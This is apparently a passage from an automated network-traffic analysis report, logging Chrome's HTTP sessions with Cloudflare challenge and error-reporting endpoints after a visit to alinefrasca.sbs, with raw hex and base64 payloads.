                                                                            2024-10-28 08:36:20 UTC1369INData Raw: 57 61 65 66 32 79 52 6c 49 75 67 70 4b 71 4c 65 62 4b 54 6d 59 31 39 6d 72 4b 72 6d 61 2b 56 78 70 4b 52 74 63 72 47 67 71 4f 36 7a 49 61 4e 6a 6f 32 68 78 73 69 65 6b 4c 44 4c 74 70 69 76 6b 36 33 65 75 35 7a 4d 34 35 79 32 78 2b 58 64 76 4c 4b 6d 79 62 6a 66 79 63 66 53 34 37 50 6b 39 4e 62 70 37 63 62 76 35 4b 37 36 2f 65 6a 4b 37 2b 76 6a 31 2b 44 55 76 62 72 63 43 4d 58 36 77 77 66 4c 44 4d 7a 62 30 4f 76 30 43 39 49 56 32 41 55 64 42 2f 7a 75 2f 68 55 43 32 74 37 39 48 68 55 69 35 66 66 71 4b 43 55 49 4d 43 6f 73 36 68 38 71 4c 69 4c 32 4e 51 73 4a 44 50 54 38 46 52 34 71 49 44 55 4e 44 30 45 76 4a 45 67 64 53 78 64 48 44 45 63 69 54 78 34 68 45 43 4e 56 4d 44 63 72 57 6b 35 45 4a 56 6f 51 50 53 6f 71 51 56 6f 7a 4c 6a 35 46 5a 53 55 6a 4f 7a 68 47
                                                                            Data Ascii: Waef2yRlIugpKqLebKTmY19mrKrma+VxpKRtcrGgqO6zIaNjo2hxsiekLDLtpivk63eu5zM45y2x+XdvLKmybjfycfS47Pk9Nbp7cbv5K76/ejK7+vj1+DUvbrcCMX6wwfLDMzb0Ov0C9IV2AUdB/zu/hUC2t79HhUi5ffqKCUIMCos6h8qLiL2NQsJDPT8FR4qIDUND0EvJEgdSxdHDEciTx4hECNVMDcrWk5EJVoQPSoqQVozLj5FZSUjOzhG
                                                                            2024-10-28 08:36:20 UTC1369INData Raw: 36 7a 73 58 53 6c 74 70 4f 4b 71 49 65 49 6d 61 6a 42 6b 49 35 36 74 6e 69 35 76 72 76 44 71 72 33 47 72 35 76 41 73 74 50 4c 76 4e 57 49 32 4b 6d 6e 74 64 44 5a 32 39 57 39 6d 63 4c 4f 32 4c 4c 51 6d 4c 62 70 30 38 50 46 78 2b 4c 5a 38 4f 76 70 72 38 65 73 74 65 37 43 38 75 6e 4b 73 76 79 39 76 66 33 4d 39 39 6e 51 33 74 44 45 32 4d 41 4b 35 4f 6f 45 35 73 55 41 34 51 51 4f 44 76 50 67 31 74 2f 30 36 41 58 4e 48 41 34 63 48 65 6b 65 38 42 50 75 39 65 2f 77 49 65 45 4c 42 79 49 48 43 67 34 72 43 42 77 68 4b 69 30 75 47 42 63 32 4e 53 55 34 47 78 4d 58 51 55 41 74 46 54 67 64 4e 79 51 79 51 68 39 49 47 6b 4e 44 4c 67 67 64 55 79 78 52 51 55 46 46 4b 45 6c 4d 4e 44 31 66 4e 6a 51 62 55 79 38 2b 4c 6a 70 41 48 6a 4d 35 4b 52 34 35 62 45 56 49 63 6d 35 52 58
                                                                            Data Ascii: 6zsXSltpOKqIeImajBkI56tni5vrvDqr3Gr5vAstPLvNWI2KmntdDZ29W9mcLO2LLQmLbp08PFx+LZ8Ovpr8este7C8unKsvy9vf3M99nQ3tDE2MAK5OoE5sUA4QQODvPg1t/06AXNHA4cHeke8BPu9e/wIeELByIHCg4rCBwhKi0uGBc2NSU4GxMXQUAtFTgdNyQyQh9IGkNDLggdUyxRQUFFKElMND1fNjQbUy8+LjpAHjM5KR45bEVIcm5RX
                                                                            2024-10-28 08:36:20 UTC1369INData Raw: 6f 6d 6e 31 37 64 35 75 59 72 4b 4f 63 6d 33 7a 41 6c 35 4f 37 67 72 6d 2b 7a 59 2f 4d 68 38 43 4a 6f 71 2f 4e 77 71 61 58 72 37 53 6c 31 74 62 4f 6d 36 75 31 32 38 4c 67 31 64 54 5a 70 73 58 5a 72 4c 65 6e 37 72 32 36 76 39 75 2b 30 4c 4b 76 37 73 33 55 79 74 53 34 75 4e 4c 2b 2b 66 30 44 2b 62 33 43 34 2f 48 6a 44 4e 6e 65 76 77 37 64 79 2f 6e 68 34 77 50 68 33 78 48 31 43 66 55 48 36 66 49 41 43 39 30 61 46 74 6b 56 41 69 41 59 43 43 6e 69 36 51 50 72 4b 50 72 71 41 2b 38 65 43 69 6f 43 38 53 34 6c 42 68 6f 46 50 2f 66 33 4f 66 4d 32 2b 77 55 65 48 42 51 43 4d 67 70 4d 46 53 6f 35 47 42 6b 66 45 54 52 43 56 68 4a 49 57 44 4d 6e 4d 7a 30 33 46 55 39 43 57 6b 52 57 4e 6c 35 41 57 46 31 6f 4b 30 46 49 62 45 5a 5a 61 57 59 78 4d 7a 4e 69 54 7a 5a 77 62 57
                                                                            Data Ascii: omn17d5uYrKOcm3zAl5O7grm+zY/Mh8CJoq/NwqaXr7Sl1tbOm6u128Lg1dTZpsXZrLen7r26v9u+0LKv7s3UytS4uNL++f0D+b3C4/HjDNnevw7dy/nh4wPh3xH1CfUH6fIAC90aFtkVAiAYCCni6QPrKPrqA+8eCioC8S4lBhoFP/f3OfM2+wUeHBQCMgpMFSo5GBkfETRCVhJIWDMnMz03FU9CWkRWNl5AWF1oK0FIbEZZaWYxMzNiTzZwbW
                                                                            2024-10-28 08:36:20 UTC1369INData Raw: 6c 70 79 68 74 4a 47 35 6c 62 79 54 70 59 53 45 79 37 7a 48 77 62 50 43 70 63 48 42 79 35 54 4e 75 73 36 58 6d 62 43 35 6c 35 6d 59 31 63 53 36 73 63 58 49 76 74 4c 4a 75 4e 69 36 7a 63 7a 77 76 39 48 41 79 38 37 56 31 4d 62 4e 32 74 61 39 73 50 50 52 39 63 37 32 77 4c 37 76 2b 2b 6e 35 36 66 7a 2b 42 65 48 71 37 38 50 72 41 73 76 7a 34 66 55 4d 43 65 6e 30 36 52 48 79 2b 50 30 52 37 52 62 78 47 65 38 43 34 4f 41 6f 47 53 51 65 45 42 38 43 48 68 34 6f 38 43 6f 58 4b 2f 50 31 44 52 62 7a 39 66 51 79 48 6a 6b 6a 48 66 73 66 4b 43 4d 56 4a 79 73 6b 43 52 63 77 4b 43 31 4e 50 69 63 50 45 7a 64 4d 4f 54 51 36 55 54 35 61 51 46 51 79 54 6a 6b 2b 56 32 45 38 56 53 46 41 50 45 6c 67 58 6c 42 4d 54 57 46 41 55 6b 46 74 53 6c 5a 4b 52 46 74 72 54 54 74 57 58 58 4d
                                                                            Data Ascii: lpyhtJG5lbyTpYSEy7zHwbPCpcHBy5TNus6XmbC5l5mY1cS6scXIvtLJuNi6zczwv9HAy87V1MbN2ta9sPPR9c72wL7v++n56fz+BeHq78PrAsvz4fUMCen06RHy+P0R7RbxGe8C4OAoGSQeEB8CHh4o8CoXK/P1DRbz9fQyHjkjHfsfKCMVJyskCRcwKC1NPicPEzdMOTQ6UT5aQFQyTjk+V2E8VSFAPElgXlBMTWFAUkFtSlZKRFtrTTtWXXM
                                                                            2024-10-28 08:36:20 UTC1369INData Raw: 4d 69 58 70 4a 6e 46 6d 61 32 72 6b 61 71 74 6b 4a 2b 32 79 73 36 7a 73 63 79 55 76 72 54 52 76 4c 61 78 77 62 43 63 6e 4d 43 34 76 72 54 46 6f 2b 7a 57 34 63 48 68 30 4f 4c 45 73 64 54 53 36 38 2f 4c 32 4f 2f 74 36 4e 76 63 38 4d 2f 68 30 50 7a 5a 35 64 6e 54 36 75 6a 2b 79 74 7a 74 37 4f 37 63 36 73 73 4f 35 41 6a 35 41 76 67 50 46 41 62 30 2b 66 48 76 37 51 4d 42 49 66 59 41 42 4f 6b 54 47 75 51 6c 44 77 6e 6e 43 78 51 50 41 52 4d 58 45 50 51 44 47 52 62 30 4c 53 41 64 4d 7a 30 55 49 6a 59 47 4d 53 49 44 42 79 70 41 48 51 73 6d 51 30 51 7a 4b 55 45 51 4e 7a 38 32 4a 55 55 6e 4f 6a 6b 76 4c 6a 35 54 58 47 46 52 58 46 4a 46 57 79 52 45 56 45 6c 66 4b 69 56 69 55 55 63 2b 54 56 4a 41 51 6c 5a 73 61 55 70 56 53 6e 46 54 57 56 35 78 54 6e 5a 53 5a 31 70 6d
                                                                            Data Ascii: MiXpJnFma2rkaqtkJ+2ys6zscyUvrTRvLaxwbCcnMC4vrTFo+zW4cHh0OLEsdTS68/L2O/t6Nvc8M/h0PzZ5dnT6uj+ytzt7O7c6ssO5Aj5AvgPFAb0+fHv7QMBIfYABOkTGuQlDwnnCxQPARMXEPQDGRb0LSAdMz0UIjYGMSIDBypAHQsmQ0QzKUEQNz82JUUnOjkvLj5TXGFRXFJFWyREVElfKiViUUc+TVJAQlZsaUpVSnFTWV5xTnZSZ1pm


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            13192.168.2.44975435.190.80.14431148C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:36:20 UTC534OUTOPTIONS /report/v4?s=tWDJGVbsRup9wEhI8G2C6JBLwORuljVlhy5aGB2I7LpDzpfC8LmIaVaoPSXEVkF9yuPp%2BpSMcGHQE3kqmLYXvbmfzz3oPnw13mj8%2BDJpZaq4QwWYQ7VahPAAB5lKL8bmzBU%3D HTTP/1.1
                                                                            Host: a.nel.cloudflare.com
                                                                            Connection: keep-alive
                                                                            Origin: https://alinefrasca.sbs
                                                                            Access-Control-Request-Method: POST
                                                                            Access-Control-Request-Headers: content-type
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            2024-10-28 08:36:20 UTC336INHTTP/1.1 200 OK
                                                                            Content-Length: 0
                                                                            access-control-max-age: 86400
                                                                            access-control-allow-methods: OPTIONS, POST
                                                                            access-control-allow-origin: *
                                                                            access-control-allow-headers: content-length, content-type
                                                                            date: Mon, 28 Oct 2024 08:36:20 GMT
                                                                            Via: 1.1 google
                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                            Connection: close


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            14192.168.2.44975635.190.80.14431148C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:36:21 UTC476OUTPOST /report/v4?s=tWDJGVbsRup9wEhI8G2C6JBLwORuljVlhy5aGB2I7LpDzpfC8LmIaVaoPSXEVkF9yuPp%2BpSMcGHQE3kqmLYXvbmfzz3oPnw13mj8%2BDJpZaq4QwWYQ7VahPAAB5lKL8bmzBU%3D HTTP/1.1
                                                                            Host: a.nel.cloudflare.com
                                                                            Connection: keep-alive
                                                                            Content-Length: 425
                                                                            Content-Type: application/reports+json
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            2024-10-28 08:36:21 UTC425OUTData Raw: 5b 7b 22 61 67 65 22 3a 30 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 33 35 37 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 61 6c 69 6e 65 66 72 61 73 63 61 2e 73 62 73 2f 70 6b 74 63 72 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 38 38 2e 31 31 34 2e 39 37 2e 33 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22 75
                                                                            Data Ascii: [{"age":0,"body":{"elapsed_time":357,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://alinefrasca.sbs/pktcr/","sampling_fraction":1.0,"server_ip":"188.114.97.3","status_code":404,"type":"http.error"},"type":"network-error","u
                                                                            2024-10-28 08:36:21 UTC168INHTTP/1.1 200 OK
                                                                            Content-Length: 0
                                                                            date: Mon, 28 Oct 2024 08:36:20 GMT
                                                                            Via: 1.1 google
                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                            Connection: close


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            15192.168.2.449758104.18.94.414431148C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:36:22 UTC598OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/101271322:1730103188:6HRbbJs87_HiCSIrxrZZgbsUH28xnY_4sVI_cjvAKEk/8d9998e48bc0e98b/S8ymOwDctYV1XFZLWDWFqSNHTXkEi0WpttSETzX6a4Y-1730104576-1.1.1.1-_4T1_B3uixuUg0D4_NLdSkm6NbVh1yndlqULNzvY0xOHel8g6vvphEUB.BRwm5rE HTTP/1.1
                                                                            Host: challenges.cloudflare.com
                                                                            Connection: keep-alive
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                            Accept: */*
                                                                            Sec-Fetch-Site: none
                                                                            Sec-Fetch-Mode: cors
                                                                            Sec-Fetch-Dest: empty
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            2024-10-28 08:36:22 UTC379INHTTP/1.1 404 Not Found
                                                                            Date: Mon, 28 Oct 2024 08:36:22 GMT
                                                                            Content-Type: application/json
                                                                            Content-Length: 7
                                                                            Connection: close
                                                                            cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                            cf-chl-out: GPYR/btNPkUhbrx2dNewh8qTSK5K5ozzZCE=$bqyc/J3vPlMdjFun
                                                                            Server: cloudflare
                                                                            CF-RAY: 8d999907ba766bf2-DFW
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            2024-10-28 08:36:22 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                            Data Ascii: invalid


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            16192.168.2.449760104.18.95.414431148C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:36:22 UTC785OUTGET /cdn-cgi/challenge-platform/h/b/i/8d9998e48bc0e98b/1730104580520/7FQTXkX5ZkBqsD6 HTTP/1.1
                                                                            Host: challenges.cloudflare.com
                                                                            Connection: keep-alive
                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                            sec-ch-ua-mobile: ?0
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                            sec-ch-ua-platform: "Windows"
                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                            Sec-Fetch-Site: same-origin
                                                                            Sec-Fetch-Mode: no-cors
                                                                            Sec-Fetch-Dest: image
                                                                            Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/50l31/0x4AAAAAAAySkc1zVXc3ztAP/auto/fbE/normal/auto/
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            2024-10-28 08:36:22 UTC200INHTTP/1.1 200 OK
                                                                            Date: Mon, 28 Oct 2024 08:36:22 GMT
                                                                            Content-Type: image/png
                                                                            Content-Length: 61
                                                                            Connection: close
                                                                            Server: cloudflare
                                                                            CF-RAY: 8d99990b0a242825-DFW
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            2024-10-28 08:36:22 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 53 00 00 00 0a 08 02 00 00 00 47 51 f5 68 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                            Data Ascii: PNGIHDRSGQhIDAT$IENDB`


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            17192.168.2.449763104.18.94.414431148C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:36:24 UTC428OUTGET /cdn-cgi/challenge-platform/h/b/i/8d9998e48bc0e98b/1730104580520/7FQTXkX5ZkBqsD6 HTTP/1.1
                                                                            Host: challenges.cloudflare.com
                                                                            Connection: keep-alive
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                            Accept: */*
                                                                            Sec-Fetch-Site: none
                                                                            Sec-Fetch-Mode: cors
                                                                            Sec-Fetch-Dest: empty
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            2024-10-28 08:36:25 UTC200INHTTP/1.1 200 OK
                                                                            Date: Mon, 28 Oct 2024 08:36:25 GMT
                                                                            Content-Type: image/png
                                                                            Content-Length: 61
                                                                            Connection: close
                                                                            Server: cloudflare
                                                                            CF-RAY: 8d99991899c56b17-DFW
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            2024-10-28 08:36:25 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 53 00 00 00 0a 08 02 00 00 00 47 51 f5 68 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                            Data Ascii: PNGIHDRSGQhIDAT$IENDB`


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            18192.168.2.449762104.18.95.414431148C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:36:24 UTC814OUTGET /cdn-cgi/challenge-platform/h/b/pat/8d9998e48bc0e98b/1730104580522/2e00cf1394d42c89cdf811406f5e4269e35051a7617a342d077837e4d476bf20/0obqbK39GmXmtGT HTTP/1.1
                                                                            Host: challenges.cloudflare.com
                                                                            Connection: keep-alive
                                                                            Cache-Control: max-age=0
                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                            sec-ch-ua-mobile: ?0
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                            sec-ch-ua-platform: "Windows"
                                                                            Accept: */*
                                                                            Sec-Fetch-Site: same-origin
                                                                            Sec-Fetch-Mode: cors
                                                                            Sec-Fetch-Dest: empty
                                                                            Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/50l31/0x4AAAAAAAySkc1zVXc3ztAP/auto/fbE/normal/auto/
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            2024-10-28 08:36:25 UTC143INHTTP/1.1 401 Unauthorized
                                                                            Date: Mon, 28 Oct 2024 08:36:25 GMT
                                                                            Content-Type: text/plain; charset=UTF-8
                                                                            Content-Length: 1
                                                                            Connection: close
                                                                            2024-10-28 08:36:25 UTC2015INData Raw: 77 77 77 2d 61 75 74 68 65 6e 74 69 63 61 74 65 3a 20 50 72 69 76 61 74 65 54 6f 6b 65 6e 20 63 68 61 6c 6c 65 6e 67 65 3d 22 41 41 49 41 47 58 42 68 64 43 31 70 63 33 4e 31 5a 58 49 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 67 4c 67 44 50 45 35 54 55 4c 49 6e 4e 2d 42 46 41 62 31 35 43 61 65 4e 51 55 61 64 68 65 6a 51 74 42 33 67 33 35 4e 52 32 76 79 41 41 47 57 4e 6f 59 57 78 73 5a 57 35 6e 5a 58 4d 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 3d 22 2c 20 74 6f 6b 65 6e 2d 6b 65 79 3d 22 4d 49 49 42 55 6a 41 39 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 6f 77 4d 4b 41 4e 4d 41 73 47 43 57 43 47 53 41 46 6c 41 77 51 43 41 71 45 61 4d 42 67 47 43 53 71 47 53 49 62 33 44 51 45 42 43 44 41 4c 42 67 6c 67 68 6b 67 42 5a 51 4d
                                                                            Data Ascii: www-authenticate: PrivateToken challenge="AAIAGXBhdC1pc3N1ZXIuY2xvdWRmbGFyZS5jb20gLgDPE5TULInN-BFAb15CaeNQUadhejQtB3g35NR2vyAAGWNoYWxsZW5nZXMuY2xvdWRmbGFyZS5jb20=", token-key="MIIBUjA9BgkqhkiG9w0BAQowMKANMAsGCWCGSAFlAwQCAqEaMBgGCSqGSIb3DQEBCDALBglghkgBZQM
                                                                            2024-10-28 08:36:25 UTC1INData Raw: 4a
                                                                            Data Ascii: J


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            19192.168.2.449765104.18.95.414431148C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:36:26 UTC1150OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/101271322:1730103188:6HRbbJs87_HiCSIrxrZZgbsUH28xnY_4sVI_cjvAKEk/8d9998e48bc0e98b/S8ymOwDctYV1XFZLWDWFqSNHTXkEi0WpttSETzX6a4Y-1730104576-1.1.1.1-_4T1_B3uixuUg0D4_NLdSkm6NbVh1yndlqULNzvY0xOHel8g6vvphEUB.BRwm5rE HTTP/1.1
                                                                            Host: challenges.cloudflare.com
                                                                            Connection: keep-alive
                                                                            Content-Length: 31397
                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                            Content-type: application/x-www-form-urlencoded
                                                                            sec-ch-ua-mobile: ?0
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                            CF-Challenge: S8ymOwDctYV1XFZLWDWFqSNHTXkEi0WpttSETzX6a4Y-1730104576-1.1.1.1-_4T1_B3uixuUg0D4_NLdSkm6NbVh1yndlqULNzvY0xOHel8g6vvphEUB.BRwm5rE
                                                                            sec-ch-ua-platform: "Windows"
                                                                            Accept: */*
                                                                            Origin: https://challenges.cloudflare.com
                                                                            Sec-Fetch-Site: same-origin
                                                                            Sec-Fetch-Mode: cors
                                                                            Sec-Fetch-Dest: empty
                                                                            Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/50l31/0x4AAAAAAAySkc1zVXc3ztAP/auto/fbE/normal/auto/
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            2024-10-28 08:36:26 UTC16384OUTData Raw: 76 5f 38 64 39 39 39 38 65 34 38 62 63 30 65 39 38 62 3d 37 6d 5a 77 57 4e 2d 25 32 62 42 53 5a 2d 6d 49 68 54 43 2d 57 55 7a 34 53 55 52 34 2d 59 7a 55 38 77 49 42 2d 49 55 4d 77 4b 59 4d 55 48 69 55 37 4a 77 2d 4d 77 55 75 5a 34 55 4b 77 73 4f 4a 51 76 77 2d 62 55 70 6f 64 72 5a 55 2d 6f 45 4e 2b 55 4b 35 6f 52 4e 55 51 6f 55 6c 55 70 6d 2d 61 54 73 54 55 2d 72 55 73 52 38 55 69 77 53 53 55 2b 77 53 68 59 45 49 72 4d 2d 39 24 53 56 64 4d 2d 58 70 70 55 55 4b 68 55 37 42 77 6a 76 77 47 39 70 55 4e 33 48 6f 6b 6c 78 67 45 5a 55 31 77 54 6e 71 55 55 41 5a 72 53 61 75 76 55 43 76 6b 35 70 6d 45 34 48 34 4e 56 61 55 62 4f 75 24 55 55 39 6f 77 55 51 55 5a 39 70 76 48 72 6d 35 38 42 68 76 57 6b 38 65 6f 71 34 55 73 42 64 69 68 5a 24 63 6f 4c 37 30 74 6b 4e 55
                                                                            Data Ascii: v_8d9998e48bc0e98b=7mZwWN-%2bBSZ-mIhTC-WUz4SUR4-YzU8wIB-IUMwKYMUHiU7Jw-MwUuZ4UKwsOJQvw-bUpodrZU-oEN+UK5oRNUQoUlUpm-aTsTU-rUsR8UiwSSU+wShYEIrM-9$SVdM-XppUUKhU7BwjvwG9pUN3HoklxgEZU1wTnqUUAZrSauvUCvk5pmE4H4NVaUbOu$UU9owUQUZ9pvHrm58BhvWk8eoq4UsBdihZ$coL70tkNU
                                                                            2024-10-28 08:36:26 UTC15013OUTData Raw: 73 41 4e 65 67 73 76 69 71 4b 6f 65 30 47 6d 54 45 2d 5a 77 55 55 50 41 4d 55 6a 2d 64 55 2b 76 53 30 55 39 76 71 35 34 55 2d 6c 55 4f 68 53 7a 55 54 77 55 76 55 42 56 4c 45 61 61 4e 53 2d 74 67 74 67 69 36 55 4c 55 53 2d 45 76 2d 68 55 7a 76 2d 55 2d 6c 55 55 77 4e 76 55 48 55 54 42 34 5a 2d 6e 55 54 79 6b 49 4f 52 6d 73 55 2d 48 61 72 77 44 77 34 6d 2d 4b 55 6f 76 4e 58 56 73 55 39 76 4e 38 55 76 55 2d 76 2d 68 55 37 55 7a 76 34 75 55 57 55 4b 4d 53 38 55 42 55 49 4d 2d 55 2d 44 55 4f 76 55 6a 2d 69 55 70 4d 54 77 4e 41 77 51 57 76 53 2d 74 6c 6f 4d 34 77 54 36 36 5a 76 2d 33 56 6b 6e 55 55 6c 6d 55 2d 55 48 76 4b 53 55 42 77 51 55 47 4b 55 39 76 37 53 34 45 54 66 56 73 30 55 6d 55 42 77 70 4d 47 39 76 5a 6d 37 77 47 32 77 2d 55 7a 77 47 32 77 70 5a 44
                                                                            Data Ascii: sANegsviqKoe0GmTE-ZwUUPAMUj-dU+vS0U9vq54U-lUOhSzUTwUvUBVLEaaNS-tgtgi6ULUS-Ev-hUzv-U-lUUwNvUHUTB4Z-nUTykIORmsU-HarwDw4m-KUovNXVsU9vN8UvU-v-hU7Uzv4uUWUKMS8UBUIM-U-DUOvUj-iUpMTwNAwQWvS-tloM4wT66Zv-3VknUUlmU-UHvKSUBwQUGKU9v7S4ETfVs0UmUBwpMG9vZm7wG2w-UzwG2wpZD
                                                                            2024-10-28 08:36:27 UTC330INHTTP/1.1 200 OK
                                                                            Date: Mon, 28 Oct 2024 08:36:27 GMT
                                                                            Content-Type: text/plain; charset=UTF-8
                                                                            Content-Length: 26272
                                                                            Connection: close
                                                                            cf-chl-gen: WSaF3lWihQOpaQiotpXmPnC4HTcbBcm60r/CUfCup8jm4371oLC8P7KayEucElrOFrSxpO3L8K32mwM9$8oFLQBF/ZOQuEEew
                                                                            Server: cloudflare
                                                                            CF-RAY: 8d999923e9a56b1d-DFW
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            2024-10-28 08:36:27 UTC1039INData Raw: 6c 37 6c 35 75 38 70 38 6d 6f 70 2f 70 49 32 4d 6a 4c 76 4d 71 73 69 30 7a 5a 53 79 74 71 4f 59 74 72 72 57 72 72 65 2b 31 72 37 41 33 4e 36 77 73 74 61 64 33 2b 72 6f 79 74 6d 71 78 37 2f 63 37 37 44 56 7a 63 6a 71 37 65 2f 51 2f 75 6e 74 30 38 79 2f 2f 4e 55 44 34 2b 41 48 39 65 4c 73 44 4d 44 75 7a 51 55 4f 38 51 54 65 33 67 33 4b 35 39 6b 53 37 66 62 35 36 42 73 43 33 74 77 46 41 42 6f 66 34 79 55 56 38 2f 72 66 4c 41 77 41 4c 41 55 74 4c 67 63 55 4d 79 77 6a 38 76 66 75 4b 76 67 72 50 69 34 67 42 44 45 63 4f 6a 34 6d 42 41 70 45 44 45 70 48 44 69 6f 65 4c 69 52 48 4a 53 41 53 53 51 77 77 4c 31 4a 50 4f 68 4a 53 4f 69 4a 4d 57 46 41 6d 57 46 4e 4b 58 56 6f 6a 52 6a 73 6f 51 30 6c 30 58 30 42 4f 61 6e 68 45 52 33 42 36 65 6a 56 75 57 6d 4a 6a 54 46 46
                                                                            Data Ascii: l7l5u8p8mop/pI2MjLvMqsi0zZSytqOYtrrWrre+1r7A3N6wstad3+roytmqx7/c77DVzcjq7e/Q/unt08y//NUD4+AH9eLsDMDuzQUO8QTe3g3K59kS7fb56BsC3twFABof4yUV8/rfLAwALAUtLgcUMywj8vfuKvgrPi4gBDEcOj4mBApEDEpHDioeLiRHJSASSQwwL1JPOhJSOiJMWFAmWFNKXVojRjsoQ0l0X0BOanhER3B6ejVuWmJjTFF
